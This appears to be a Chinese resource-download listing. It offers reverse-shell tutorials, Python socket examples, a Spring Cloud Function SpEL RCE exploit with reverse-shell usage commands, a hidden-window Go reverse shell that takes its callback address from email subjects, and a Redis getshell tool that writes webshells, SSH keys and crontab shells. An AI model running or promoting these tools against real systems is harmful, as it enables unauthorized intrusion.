反弹 shell 常见方式详解(非常实用)
[ 隧道技术 ] 反弹shell(一)nc反弹shell
[ 隧道技术 ] 反弹shell(二)bash反弹shell
[ 隧道技术 ] 反弹shell(三)powercat反弹shell
[ 隧道技术 ] 反弹shell(四)python反弹shell
2022-10-18 09:00:08
1.92MB
python 实现socket通信实例之server.py
socket又称套间字或者插口,是网络通信中必不可少的工具。有道是:“无socket,不网络”。由于socket最早在BSD Unix上使用,而Unix/Linux所奉为经典的至高哲学是“一切皆是文件”。因此socket在使用时也是完全符合这个哲学的,它涉及到listen()、bind()、accept()、write()/read()、close()等基本的类似于文件操作的功能函数。
上述Socket功能函数是从传输层协议TCP或者UDP中抽象出来的,一个基本的socket通信可以通过固定的功能函数实现。这里插一句,IP协议是工作在网络层的。
2022-09-04 22:00:12
764B
1
python 实现socket通信实例之client.py
socket又称套间字或者插口,是网络通信中必不可少的工具。有道是:“无socket,不网络”。由于socket最早在BSD Unix上使用,而Unix/Linux所奉为经典的至高哲学是“一切皆是文件”。因此socket在使用时也是完全符合这个哲学的,它涉及到listen()、bind()、accept()、write()/read()、close()等基本的类似于文件操作的功能函数。
上述Socket功能函数是从传输层协议TCP或者UDP中抽象出来的,一个基本的socket通信可以通过固定的功能函数实现。这里插一句,IP协议是工作在网络层的。
2022-09-04 22:00:11
757B
1
Spring Cloud Function 是基于Spring Boot 的函数计算框架,它抽象出所有传输细节和基础架构,允许开发人员保留所有熟悉的工具和流程,并专注于业务逻辑。
批量检测脚本:python Spel_RCE_POC.py url.txt
反弹shell脚本:python Spel_RCE_Bash_EXP.py url lhost lport
受影响版本:3.0.0.RELEASE <= Spring Cloud Function <= 3.2.2
2022-04-06 00:15:51
4KB
1
使用邮件地址作为反弹shell的服务器地址,用于windows的反弹shell,可在编译时选择隐藏弹出窗口
This golng reverse shell fetches the address from your latest email subject, and the subject should be like this:
10.1.1.1:1234
This golag file requires go-pop3 lib which you can get it here:
https://github.com/taknb2nch/go-pop3.git
If you want to hide the window when executing it, compile the program like this:
go build -ldflags -H=windowsgui email_reverse_shell-repl.go
2021-08-28 22:05:14
1.81MB
1
Redis-Getshell
其中的p参数为了区别端口P我将其改成了a
Redis 未授权检测,密码爆破,Webshell写入,SSH公私钥写入,定时计划反弹Shell
Usage:python3 RedisGetshell.py -H 127.0.0.1 -P 6379
还可以更完善的,后面有时间了就修改哈!
Webshell
SSH
crontab
2021-08-18 20:18:31
3KB
1